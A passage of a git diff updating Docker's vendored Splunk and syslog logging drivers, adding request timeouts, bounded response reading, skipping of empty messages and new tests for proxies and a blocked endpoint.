ok { + if splunkFormatParsed, ok := info.Config[splunkFormatKey]; ok { switch splunkFormatParsed { case splunkFormatInline: case splunkFormatJSON: @@ -336,7 +348,7 @@ func (l *splunkLoggerInline) Log(msg *logger.Message) error { event.Source = msg.Source message.Event = &event - + logger.PutMessage(msg) return l.queueMessageAsync(message) } @@ -354,15 +366,20 @@ func (l *splunkLoggerJSON) Log(msg *logger.Message) error { event.Source = msg.Source message.Event = &event - + logger.PutMessage(msg) return l.queueMessageAsync(message) } func (l *splunkLoggerRaw) Log(msg *logger.Message) error { + // empty or whitespace-only messages are not accepted by HEC + if strings.TrimSpace(string(msg.Line)) == "" { + return nil + } + message := l.createSplunkMessage(msg) message.Event = string(append(l.prefix, msg.Line...)) - + logger.PutMessage(msg) return l.queueMessageAsync(message) } @@ -406,13 +423,18 @@ func (l *splunkLogger) worker() { func (l *splunkLogger) postMessages(messages []*splunkMessage, lastChance bool) []*splunkMessage { messagesLen := len(messages) + + ctx, cancel := context.WithTimeout(context.Background(), batchSendTimeout) + defer cancel() + for i := 0; i < messagesLen; i += l.postMessagesBatchSize { upperBound := i + l.postMessagesBatchSize if upperBound > messagesLen { upperBound = messagesLen } - if err := l.tryPostMessages(messages[i:upperBound]); err != nil { - logrus.Error(err) + + if err := l.tryPostMessages(ctx, messages[i:upperBound]); err != nil { + logrus.WithError(err).WithField("module", "logger/splunk").Warn("Error while sending logs") if messagesLen-i >= l.bufferMaximum || lastChance { // If this is last chance - print them all to the daemon log if lastChance { @@ -437,7 +459,7 @@ func (l *splunkLogger) postMessages(messages []*splunkMessage, lastChance bool) return messages[:0] } -func (l *splunkLogger) tryPostMessages(messages []*splunkMessage) error { +func (l *splunkLogger) tryPostMessages(ctx context.Context, messages []*splunkMessage) error { if len(messages) == 0 { return nil } @@ -476,25 +498,28 @@ func (l *splunkLogger) tryPostMessages(messages []*splunkMessage) error { if err != nil { return err } + req = req.WithContext(ctx) req.Header.Set("Authorization", l.auth) // Tell if we are sending gzip compressed body if l.gzipCompression { req.Header.Set("Content-Encoding", "gzip") } - res, err := l.client.Do(req) + resp, err := l.client.Do(req) if err != nil { return err } - defer res.Body.Close() - if res.StatusCode != http.StatusOK { - var body []byte - body, err = ioutil.ReadAll(res.Body) + defer func() { + pools.Copy(ioutil.Discard, resp.Body) + resp.Body.Close() + }() + if resp.StatusCode != http.StatusOK { + rdr := io.LimitReader(resp.Body, maxResponseSize) + body, err := ioutil.ReadAll(rdr) if err != nil { return err } - return fmt.Errorf("%s: failed to send event - %s - %s", driverName, res.Status, body) + return fmt.Errorf("%s: failed to send event - %s - %s", driverName, resp.Status, string(body)) } - io.Copy(ioutil.Discard, res.Body) return nil } @@ -538,6 +563,7 @@ func ValidateLogOpt(cfg map[string]string) error { case splunkGzipCompressionKey: case splunkGzipCompressionLevelKey: case envKey: + case envRegexKey: case labelsKey: case tagKey: default: @@ -547,8 +573,8 @@ func ValidateLogOpt(cfg map[string]string) error { return nil } -func parseURL(ctx logger.Context) (*url.URL, error) { - splunkURLStr, ok := ctx.Config[splunkURLKey] +func parseURL(info logger.Info) (*url.URL, error) { + splunkURLStr, ok := info.Config[splunkURLKey] if !ok { return nil, fmt.Errorf("%s: %s is expected", driverName, splunkURLKey) } @@ -576,20 +602,22 @@ func verifySplunkConnection(l *splunkLogger) error { if err != nil { return err } - res, err := l.client.Do(req) + resp, err := l.client.Do(req) if err != nil { return err } - if res.Body != nil { - defer res.Body.Close() - } - if res.StatusCode != http.StatusOK { - var body []byte - body, err = ioutil.ReadAll(res.Body) + defer func() { + pools.Copy(ioutil.Discard, resp.Body) + resp.Body.Close() + }() + + if resp.StatusCode != http.StatusOK { + rdr := io.LimitReader(resp.Body, maxResponseSize) + body, err := ioutil.ReadAll(rdr) if err != nil { return err } - return fmt.Errorf("%s: failed to verify connection - %s - %s", driverName, res.Status, body) + return fmt.Errorf("%s: failed to verify connection - %s - %s", driverName, resp.Status, string(body)) } return nil } diff --git a/vendor/github.com/docker/docker/daemon/logger/splunk/splunk_test.go b/vendor/github.com/docker/docker/daemon/logger/splunk/splunk_test.go index df74cbad5f..cfb83e80d1 100644 --- a/vendor/github.com/docker/docker/daemon/logger/splunk/splunk_test.go +++ b/vendor/github.com/docker/docker/daemon/logger/splunk/splunk_test.go @@ -1,13 +1,18 @@ -package splunk +package splunk // import "github.com/docker/docker/daemon/logger/splunk" import ( "compress/gzip" + "context" "fmt" + "net/http" "os" + "runtime" "testing" "time" "github.com/docker/docker/daemon/logger" + "gotest.tools/assert" + "gotest.tools/env" ) // Validate options @@ -25,9 +30,10 @@ func TestValidateLogOpt(t *testing.T) { splunkVerifyConnectionKey: "true", splunkGzipCompressionKey: "true", splunkGzipCompressionLevelKey: "1", - envKey: "a", - labelsKey: "b", - tagKey: "c", + envKey: "a", + envRegexKey: "^foo", + labelsKey: "b", + tagKey: "c", }) if err != nil { t.Fatal(err) @@ -43,10 +49,10 @@ func TestValidateLogOpt(t *testing.T) { // Driver require user to specify required options func TestNewMissedConfig(t *testing.T) { - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{}, } - _, err := New(ctx) + _, err := New(info) if err == nil { t.Fatal("Logger driver should fail when no required parameters specified") } @@ -54,12 +60,12 @@ func TestNewMissedConfig(t *testing.T) { // Driver require user to specify splunk-url func TestNewMissedUrl(t *testing.T) { - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ splunkTokenKey: "4642492F-D8BD-47F1-A005-0C08AE4657DF", }, } - _, err := New(ctx) + _, err := New(info) if err.Error() != "splunk: splunk-url is expected" { t.Fatal("Logger driver should fail when no required parameters specified") } @@ -67,24 +73,54 @@ func TestNewMissedUrl(t *testing.T) { // Driver require user to specify splunk-token func TestNewMissedToken(t *testing.T) { - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ splunkURLKey: "http://127.0.0.1:8088", }, } - _, err := New(ctx) + _, err := New(info) if err.Error() != "splunk: splunk-token is expected" { t.Fatal("Logger driver should fail when no required parameters specified") } } +func TestNewWithProxy(t *testing.T) { + proxy := "http://proxy.testing:8888" + reset := env.Patch(t, "HTTP_PROXY", proxy) + defer reset() + + // must not be localhost + splunkURL := "http://example.com:12345" + logger, err := New(logger.Info{ + Config: map[string]string{ + splunkURLKey: splunkURL, + splunkTokenKey: "token", + splunkVerifyConnectionKey: "false", + }, + ContainerID: "containeriid", + }) + assert.NilError(t, err) + splunkLogger := logger.(*splunkLoggerInline) + + proxyFunc := splunkLogger.transport.Proxy + assert.Assert(t, proxyFunc != nil) + + req, err := http.NewRequest("GET", splunkURL, nil) + assert.NilError(t, err) + + proxyURL, err := proxyFunc(req) + assert.NilError(t, err) + assert.Assert(t, proxyURL != nil) + assert.Equal(t, proxy, proxyURL.String()) +} + // Test default settings func TestDefault(t *testing.T) { hec := NewHTTPEventCollectorMock(t) go hec.Serve() - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ splunkURLKey: hec.URL(), splunkTokenKey: hec.token, @@ -95,12 +131,12 @@ func TestDefault(t *testing.T) { ContainerImageName: "container_image_name", } - hostname, err := ctx.Hostname() + hostname, err := info.Hostname() if err != nil { t.Fatal(err) } - loggerDriver, err := New(ctx) + loggerDriver, err := New(info) if err != nil { t.Fatal(err) } @@ -124,7 +160,7 @@ func TestDefault(t *testing.T) { splunkLoggerDriver.nullMessage.Source != "" || splunkLoggerDriver.nullMessage.SourceType != "" || splunkLoggerDriver.nullMessage.Index != "" || - splunkLoggerDriver.gzipCompression != false || + splunkLoggerDriver.gzipCompression || splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency || splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize || splunkLoggerDriver.bufferMaximum != defaultBufferMaximum || @@ -133,11 +169,11 @@ func TestDefault(t *testing.T) { } message1Time := time.Now() - if err := loggerDriver.Log(&logger.Message{[]byte("{\"a\":\"b\"}"), "stdout", message1Time, nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte("{\"a\":\"b\"}"), Source: "stdout", Timestamp: message1Time}); err != nil { t.Fatal(err) } message2Time := time.Now() - if err := loggerDriver.Log(&logger.Message{[]byte("notajson"), "stdout", message2Time, nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte("notajson"), Source: "stdout", Timestamp: message2Time}); err != nil { t.Fatal(err) } @@ -206,7 +242,7 @@ func TestInlineFormatWithNonDefaultOptions(t *testing.T) { go hec.Serve() - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ splunkURLKey: hec.URL(), splunkTokenKey: hec.token, @@ -215,8 +251,9 @@ func TestInlineFormatWithNonDefaultOptions(t *testing.T) { splunkIndexKey: "myindex", splunkFormatKey: splunkFormatInline, splunkGzipCompressionKey: "true", - tagKey: "{{.ImageName}}/{{.Name}}", - labelsKey: "a", + tagKey: "{{.ImageName}}/{{.Name}}", + labelsKey: "a", + envRegexKey: "^foo", }, ContainerID: "containeriid", ContainerName: "/container_name", @@ -225,14 +262,15 @@ func TestInlineFormatWithNonDefaultOptions(t *testing.T) { ContainerLabels: map[string]string{ "a": "b", }, + ContainerEnv: []string{"foo_finder=bar"}, } - hostname, err := ctx.Hostname() + hostname, err := info.Hostname() if err != nil { t.Fatal(err) } - loggerDriver, err := New(ctx) + loggerDriver, err := New(info) if err != nil { t.Fatal(err) } @@ -252,7 +290,7 @@ func TestInlineFormatWithNonDefaultOptions(t *testing.T) { splunkLoggerDriver.nullMessage.Source != "mysource" || splunkLoggerDriver.nullMessage.SourceType != "mysourcetype" || splunkLoggerDriver.nullMessage.Index != "myindex" || - splunkLoggerDriver.gzipCompression != true || + !splunkLoggerDriver.gzipCompression || splunkLoggerDriver.gzipCompressionLevel != gzip.DefaultCompression || splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency || splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize || @@ -262,7 +300,7 @@ func TestInlineFormatWithNonDefaultOptions(t *testing.T) { } messageTime := time.Now() - if err := loggerDriver.Log(&logger.Message{[]byte("1"), "stdout", messageTime, nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte("1"), Source: "stdout", Timestamp: messageTime}); err != nil { t.Fatal(err) } @@ -295,6 +333,7 @@ func TestInlineFormatWithNonDefaultOptions(t *testing.T) { event["source"] != "stdout" || event["tag"] != "container_image_name/container_name" || event["attrs"].(map[string]interface{})["a"] != "b" || + event["attrs"].(map[string]interface{})["foo_finder"] != "bar" || len(event) != 4 { t.Fatalf("Unexpected event in message %v", event) } @@ -312,7 +351,7 @@ func TestJsonFormat(t *testing.T) { go hec.Serve() - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ splunkURLKey: hec.URL(), splunkTokenKey: hec.token, @@ -326,12 +365,12 @@ func TestJsonFormat(t *testing.T) { ContainerImageName: "container_image_name", } - hostname, err := ctx.Hostname() + hostname, err := info.Hostname() if err != nil { t.Fatal(err) } - loggerDriver, err := New(ctx) + loggerDriver, err := New(info) if err != nil { t.Fatal(err) } @@ -351,7 +390,7 @@ func TestJsonFormat(t *testing.T) { splunkLoggerDriver.nullMessage.Source != "" || splunkLoggerDriver.nullMessage.SourceType != "" || splunkLoggerDriver.nullMessage.Index != "" || - splunkLoggerDriver.gzipCompression != true || + !splunkLoggerDriver.gzipCompression || splunkLoggerDriver.gzipCompressionLevel != gzip.BestSpeed || splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency || splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize || @@ -361,11 +400,11 @@ func TestJsonFormat(t *testing.T) { } message1Time := time.Now() - if err := loggerDriver.Log(&logger.Message{[]byte("{\"a\":\"b\"}"), "stdout", message1Time, nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte("{\"a\":\"b\"}"), Source: "stdout", Timestamp: message1Time}); err != nil { t.Fatal(err) } message2Time := time.Now() - if err := loggerDriver.Log(&logger.Message{[]byte("notjson"), "stdout", message2Time, nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte("notjson"), Source: "stdout", Timestamp: message2Time}); err != nil { t.Fatal(err) } @@ -431,7 +470,7 @@ func TestRawFormat(t *testing.T) { go hec.Serve() - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ splunkURLKey: hec.URL(), splunkTokenKey: hec.token, @@ -443,15 +482,11 @@ func TestRawFormat(t *testing.T) { ContainerImageName: "container_image_name", } - hostname, err := ctx.Hostname() - if err != nil { - t.Fatal(err) - } + hostname, err := info.Hostname() + assert.NilError(t, err) - loggerDriver, err := New(ctx) - if err != nil { - t.Fatal(err) - } + loggerDriver, err := New(info) + assert.NilError(t, err) if !hec.connectionVerified { t.Fatal("By default connection should be verified") @@ -468,7 +503,7 @@ func TestRawFormat(t *testing.T) { splunkLoggerDriver.nullMessage.Source != "" || splunkLoggerDriver.nullMessage.SourceType != "" || splunkLoggerDriver.nullMessage.Index != "" || - splunkLoggerDriver.gzipCompression != false || + splunkLoggerDriver.gzipCompression || splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency || splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize || splunkLoggerDriver.bufferMaximum != defaultBufferMaximum || @@ -478,11 +513,11 @@ func TestRawFormat(t *testing.T) { } message1Time := time.Now() - if err := loggerDriver.Log(&logger.Message{[]byte("{\"a\":\"b\"}"), "stdout", message1Time, nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte("{\"a\":\"b\"}"), Source: "stdout", Timestamp: message1Time}); err != nil { t.Fatal(err) } message2Time := time.Now() - if err := loggerDriver.Log(&logger.Message{[]byte("notjson"), "stdout", message2Time, nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte("notjson"), Source: "stdout", Timestamp: message2Time}); err != nil { t.Fatal(err) } @@ -541,7 +576,7 @@ func TestRawFormatWithLabels(t *testing.T) { go hec.Serve() - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ splunkURLKey: hec.URL(), splunkTokenKey: hec.token, @@ -557,12 +592,12 @@ func TestRawFormatWithLabels(t *testing.T) { }, } - hostname, err := ctx.Hostname() + hostname, err := info.Hostname() if err != nil { t.Fatal(err) } - loggerDriver, err := New(ctx) + loggerDriver, err := New(info) if err != nil { t.Fatal(err) } @@ -582,7 +617,7 @@ func TestRawFormatWithLabels(t *testing.T) { splunkLoggerDriver.nullMessage.Source != "" || splunkLoggerDriver.nullMessage.SourceType != "" || splunkLoggerDriver.nullMessage.Index != "" || - splunkLoggerDriver.gzipCompression != false || + splunkLoggerDriver.gzipCompression || splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency || splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize || splunkLoggerDriver.bufferMaximum != defaultBufferMaximum || @@ -592,11 +627,11 @@ func TestRawFormatWithLabels(t *testing.T) { } message1Time := time.Now() - if err := loggerDriver.Log(&logger.Message{[]byte("{\"a\":\"b\"}"), "stdout", message1Time, nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte("{\"a\":\"b\"}"), Source: "stdout", Timestamp: message1Time}); err != nil { t.Fatal(err) } message2Time := time.Now() - if err := loggerDriver.Log(&logger.Message{[]byte("notjson"), "stdout", message2Time, nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte("notjson"), Source: "stdout", Timestamp: message2Time}); err != nil { t.Fatal(err) } @@ -639,7 +674,7 @@ func TestRawFormatWithLabels(t *testing.T) { t.Fatal(err) } else { if event != "containeriid a=b notjson" { - t.Fatalf("Unexpected event in message 1 %v", event) + t.Fatalf("Unexpected event in message 2 %v", event) } } @@ -656,7 +691,7 @@ func TestRawFormatWithoutTag(t *testing.T) { go hec.Serve() - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ splunkURLKey: hec.URL(), splunkTokenKey: hec.token, @@ -669,12 +704,12 @@ func TestRawFormatWithoutTag(t *testing.T) { ContainerImageName: "container_image_name", } - hostname, err := ctx.Hostname() + hostname, err := info.Hostname() if err != nil { t.Fatal(err) } - loggerDriver, err := New(ctx) + loggerDriver, err := New(info) if err != nil { t.Fatal(err) } @@ -694,7 +729,7 @@ func TestRawFormatWithoutTag(t *testing.T) { splunkLoggerDriver.nullMessage.Source != "" || splunkLoggerDriver.nullMessage.SourceType != "" || splunkLoggerDriver.nullMessage.Index != "" || - splunkLoggerDriver.gzipCompression != false || + splunkLoggerDriver.gzipCompression || splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency || splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize || splunkLoggerDriver.bufferMaximum != defaultBufferMaximum || @@ -705,11 +740,15 @@ func TestRawFormatWithoutTag(t *testing.T) { } message1Time := time.Now() - if err := loggerDriver.Log(&logger.Message{[]byte("{\"a\":\"b\"}"), "stdout", message1Time, nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte("{\"a\":\"b\"}"), Source: "stdout", Timestamp: message1Time}); err != nil { t.Fatal(err) } message2Time := time.Now() - if err := loggerDriver.Log(&logger.Message{[]byte("notjson"), "stdout", message2Time, nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte("notjson"), Source: "stdout", Timestamp: message2Time}); err != nil { + t.Fatal(err) + } + message3Time := time.Now() + if err := loggerDriver.Log(&logger.Message{Line: []byte(" "), Source: "stdout", Timestamp: message3Time}); err != nil { t.Fatal(err) } @@ -718,6 +757,9 @@ func TestRawFormatWithoutTag(t *testing.T) { t.Fatal(err) } + // message3 would have an empty or whitespace only string in the "event" field + // both of which are not acceptable to HEC + // thus here we must expect 2 messages, not 3 if len(hec.messages) != 2 { t.Fatal("Expected two messages") } @@ -752,7 +794,7 @@ func TestRawFormatWithoutTag(t *testing.T) { t.Fatal(err) } else { if event != "notjson" { - t.Fatalf("Unexpected event in message 1 %v", event) + t.Fatalf("Unexpected event in message 2 %v", event) } } @@ -773,7 +815,7 @@ func TestBatching(t *testing.T) { go hec.Serve() - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ splunkURLKey: hec.URL(), splunkTokenKey: hec.token, @@ -784,13 +826,13 @@ func TestBatching(t *testing.T) { ContainerImageName: "container_image_name", } - loggerDriver, err := New(ctx) + loggerDriver, err := New(info) if err != nil { t.Fatal(err) } for i := 0; i < defaultStreamChannelSize*4; i++ { - if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte(fmt.Sprintf("%d", i)), Source: "stdout", Timestamp: time.Now()}); err != nil { t.Fatal(err) } } @@ -839,7 +881,7 @@ func TestFrequency(t *testing.T) { go hec.Serve() - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ splunkURLKey: hec.URL(), splunkTokenKey: hec.token, @@ -850,13 +892,13 @@ func TestFrequency(t *testing.T) { ContainerImageName: "container_image_name", } - loggerDriver, err := New(ctx) + loggerDriver, err := New(info) if err != nil { t.Fatal(err) } for i := 0; i < 10; i++ { - if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte(fmt.Sprintf("%d", i)), Source: "stdout", Timestamp: time.Now()}); err != nil { t.Fatal(err) } time.Sleep(15 * time.Millisecond) @@ -920,7 +962,7 @@ func TestOneMessagePerRequest(t *testing.T) { go hec.Serve() - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ splunkURLKey: hec.URL(), splunkTokenKey: hec.token, @@ -931,13 +973,13 @@ func TestOneMessagePerRequest(t *testing.T) { ContainerImageName: "container_image_name", } - loggerDriver, err := New(ctx) + loggerDriver, err := New(info) if err != nil { t.Fatal(err) } for i := 0; i < 10; i++ { - if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte(fmt.Sprintf("%d", i)), Source: "stdout", Timestamp: time.Now()}); err != nil { t.Fatal(err) } } @@ -994,7 +1036,7 @@ func TestVerify(t *testing.T) { hec.simulateServerError = true go hec.Serve() - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ splunkURLKey: hec.URL(), splunkTokenKey: hec.token, @@ -1005,7 +1047,7 @@ func TestVerify(t *testing.T) { ContainerImageName: "container_image_name", } - _, err := New(ctx) + _, err := New(info) if err == nil { t.Fatal("Expecting driver to fail, when server is unresponsive") } @@ -1023,7 +1065,7 @@ func TestSkipVerify(t *testing.T) { hec.simulateServerError = true go hec.Serve() - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ splunkURLKey: hec.URL(), splunkTokenKey: hec.token, @@ -1035,7 +1077,7 @@ func TestSkipVerify(t *testing.T) { ContainerImageName: "container_image_name", } - loggerDriver, err := New(ctx) + loggerDriver, err := New(info) if err != nil { t.Fatal(err) } @@ -1045,7 +1087,7 @@ func TestSkipVerify(t *testing.T) { } for i := 0; i < defaultStreamChannelSize*2; i++ { - if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte(fmt.Sprintf("%d", i)), Source: "stdout", Timestamp: time.Now()}); err != nil { t.Fatal(err) } } @@ -1054,10 +1096,10 @@ func TestSkipVerify(t *testing.T) { t.Fatal("No messages should be accepted at this point") } - hec.simulateServerError = false + hec.simulateErr(false) for i := defaultStreamChannelSize * 2; i < defaultStreamChannelSize*4; i++ { - if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte(fmt.Sprintf("%d", i)), Source: "stdout", Timestamp: time.Now()}); err != nil { t.Fatal(err) } } @@ -1102,10 +1144,10 @@ func TestBufferMaximum(t *testing.T) { } hec := NewHTTPEventCollectorMock(t) - hec.simulateServerError = true + hec.simulateErr(true) go hec.Serve() - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ splunkURLKey: hec.URL(), splunkTokenKey: hec.token, @@ -1117,7 +1159,7 @@ func TestBufferMaximum(t *testing.T) { ContainerImageName: "container_image_name", } - loggerDriver, err := New(ctx) + loggerDriver, err := New(info) if err != nil { t.Fatal(err) } @@ -1127,7 +1169,7 @@ func TestBufferMaximum(t *testing.T) { } for i := 0; i < 11; i++ { - if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte(fmt.Sprintf("%d", i)), Source: "stdout", Timestamp: time.Now()}); err != nil { t.Fatal(err) } } @@ -1194,7 +1236,7 @@ func TestServerAlwaysDown(t *testing.T) { hec.simulateServerError = true go hec.Serve() - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ splunkURLKey: hec.URL(), splunkTokenKey: hec.token, @@ -1206,7 +1248,7 @@ func TestServerAlwaysDown(t *testing.T) { ContainerImageName: "container_image_name", } - loggerDriver, err := New(ctx) + loggerDriver, err := New(info) if err != nil { t.Fatal(err) } @@ -1216,7 +1258,7 @@ func TestServerAlwaysDown(t *testing.T) { } for i := 0; i < 5; i++ { - if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte(fmt.Sprintf("%d", i)), Source: "stdout", Timestamp: time.Now()}); err != nil { t.Fatal(err) } } @@ -1253,7 +1295,7 @@ func TestCannotSendAfterClose(t *testing.T) { hec := NewHTTPEventCollectorMock(t) go hec.Serve() - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ splunkURLKey: hec.URL(), splunkTokenKey: hec.token, @@ -1264,12 +1306,12 @@ func TestCannotSendAfterClose(t *testing.T) { ContainerImageName: "container_image_name", } - loggerDriver, err := New(ctx) + loggerDriver, err := New(info) if err != nil { t.Fatal(err) } - if err := loggerDriver.Log(&logger.Message{[]byte("message1"), "stdout", time.Now(), nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte("message1"), Source: "stdout", Timestamp: time.Now()}); err != nil { t.Fatal(err) } @@ -1278,7 +1320,7 @@ func TestCannotSendAfterClose(t *testing.T) { t.Fatal(err) } - if err := loggerDriver.Log(&logger.Message{[]byte("message2"), "stdout", time.Now(), nil, false}); err == nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte("message2"), Source: "stdout", Timestamp: time.Now()}); err == nil { t.Fatal("Driver should not allow to send messages after close") } @@ -1300,3 +1342,48 @@ func TestCannotSendAfterClose(t *testing.T) { t.Fatal(err) } } + +func TestDeadlockOnBlockedEndpoint(t *testing.T) { + hec := NewHTTPEventCollectorMock(t) + go hec.Serve() + info := logger.Info{ + Config: map[string]string{ + splunkURLKey: hec.URL(), + splunkTokenKey: hec.token, + }, + ContainerID: "containeriid", + ContainerName: "/container_name", + ContainerImageID: "contaimageid", + ContainerImageName: "container_image_name", + } + + l, err := New(info) + if err != nil { + t.Fatal(err) + } + + ctx, unblock := context.WithCancel(context.Background()) + hec.withBlock(ctx) + defer unblock() + + batchSendTimeout = 1 * time.Second + + if err := l.Log(&logger.Message{}); err != nil { + t.Fatal(err) + } + + done := make(chan struct{}) + go func() { + l.Close() + close(done) + }() + + select { + case <-time.After(60 * time.Second): + buf := make([]byte, 1e6) + buf = buf[:runtime.Stack(buf, true)] + t.Logf("STACK DUMP: \n\n%s\n\n", string(buf)) + t.Fatal("timeout waiting for close to finish") + case <-done: + } +} diff --git a/vendor/github.com/docker/docker/daemon/logger/splunk/splunkhecmock_test.go b/vendor/github.com/docker/docker/daemon/logger/splunk/splunkhecmock_test.go index e508948280..a3a83ac103 100644 --- a/vendor/github.com/docker/docker/daemon/logger/splunk/splunkhecmock_test.go +++ b/vendor/github.com/docker/docker/daemon/logger/splunk/splunkhecmock_test.go @@ -1,13 +1,15 @@ -package splunk +package splunk // import "github.com/docker/docker/daemon/logger/splunk" import ( "compress/gzip" + "context" "encoding/json" "fmt" "io" "io/ioutil" "net" "net/http" + "sync" "testing" ) @@ -29,8 +31,10 @@ type HTTPEventCollectorMock struct { tcpAddr *net.TCPAddr tcpListener *net.TCPListener + mu sync.Mutex token string simulateServerError bool + blockingCtx context.Context test *testing.T @@ -55,6 +59,18 @@ func NewHTTPEventCollectorMock(t *testing.T) *HTTPEventCollectorMock { connectionVerified: false} } +func (hec *HTTPEventCollectorMock) simulateErr(b bool) { + hec.mu.Lock() + hec.simulateServerError = b + hec.mu.Unlock() +} + +func (hec *HTTPEventCollectorMock) withBlock(ctx context.Context) { + hec.mu.Lock() + hec.blockingCtx = ctx + hec.mu.Unlock() +} + func (hec *HTTPEventCollectorMock) URL() string { return "http://" + hec.tcpListener.Addr().String() } @@ -72,7 +88,16 @@ func (hec *HTTPEventCollectorMock) ServeHTTP(writer http.ResponseWriter, request hec.numOfRequests++ - if hec.simulateServerError { + hec.mu.Lock() + simErr := hec.simulateServerError + ctx := hec.blockingCtx + hec.mu.Unlock() + + if ctx != nil { + <-hec.blockingCtx.Done() + } + + if simErr { if request.Body != nil { defer request.Body.Close() } diff --git a/vendor/github.com/docker/docker/daemon/logger/syslog/syslog.go b/vendor/github.com/docker/docker/daemon/logger/syslog/syslog.go index fb9e867ff5..94bdee364a 100644 --- a/vendor/github.com/docker/docker/daemon/logger/syslog/syslog.go +++ b/vendor/github.com/docker/docker/daemon/logger/syslog/syslog.go @@ -1,5 +1,5 @@ // Package syslog provides the logdriver for forwarding server logs to syslog endpoints. -package syslog +package syslog // import "github.com/docker/docker/daemon/logger/syslog" import ( "crypto/tls" @@ -14,11 +14,11 @@ import ( syslog "github.com/RackSec/srslog" - "github.com/Sirupsen/logrus" "github.com/docker/docker/daemon/logger" "github.com/docker/docker/daemon/logger/loggerutils" "github.com/docker/docker/pkg/urlutil" "github.com/docker/go-connections/tlsconfig" + "github.com/sirupsen/logrus" ) const ( @@ -68,18 +68,18 @@ func init() { func rfc5424formatterWithAppNameAsTag(p syslog.Priority, hostname, tag, content string) string { timestamp := time.Now().Format(time.RFC3339) pid := os.Getpid() - msg := fmt.Sprintf("<%d>%d %s %s %s %d %s %s", + msg := fmt.Sprintf("<%d>%d %s %s %s %d %s - %s", p, 1, timestamp, hostname, tag, pid, tag, content) return msg } // The timestamp field in rfc5424 is derived from rfc3339. Whereas rfc3339 makes allowances -// for multiple syntaxes, there are further restrictions in rfc5424, i.e., the maximium +// for multiple syntaxes, there are further restrictions in rfc5424, i.e., the maximum // resolution is limited to "TIME-SECFRAC" which is 6 (microsecond resolution) func rfc5424microformatterWithAppNameAsTag(p syslog.Priority, hostname, tag, content string) string { timestamp := time.Now().Format("2006-01-02T15:04:05.999999Z07:00") pid := os.Getpid() - msg := fmt.Sprintf("<%d>%d %s %s %s %d %s %s", + msg := fmt.Sprintf("<%d>%d %s %s %s %d %s - %s", p, 1, timestamp, hostname, tag, pid, tag, content) return msg } @@ -87,30 +87,30 @@ func rfc5424microformatterWithAppNameAsTag(p syslog.Priority, hostname, tag, con // New creates a syslog logger using the configuration passed in on // the context. Supported context configuration variables are // syslog-address, syslog-facility, syslog-format. -func New(ctx logger.Context) (logger.Logger, error) { - tag, err := loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate) +func New(info logger.Info) (logger.Logger, error) { + tag, err := loggerutils.ParseLogTag(info, loggerutils.DefaultTemplate) if err != nil { return nil, err } - proto, address, err := parseAddress(ctx.Config["syslog-address"]) + proto, address, err := 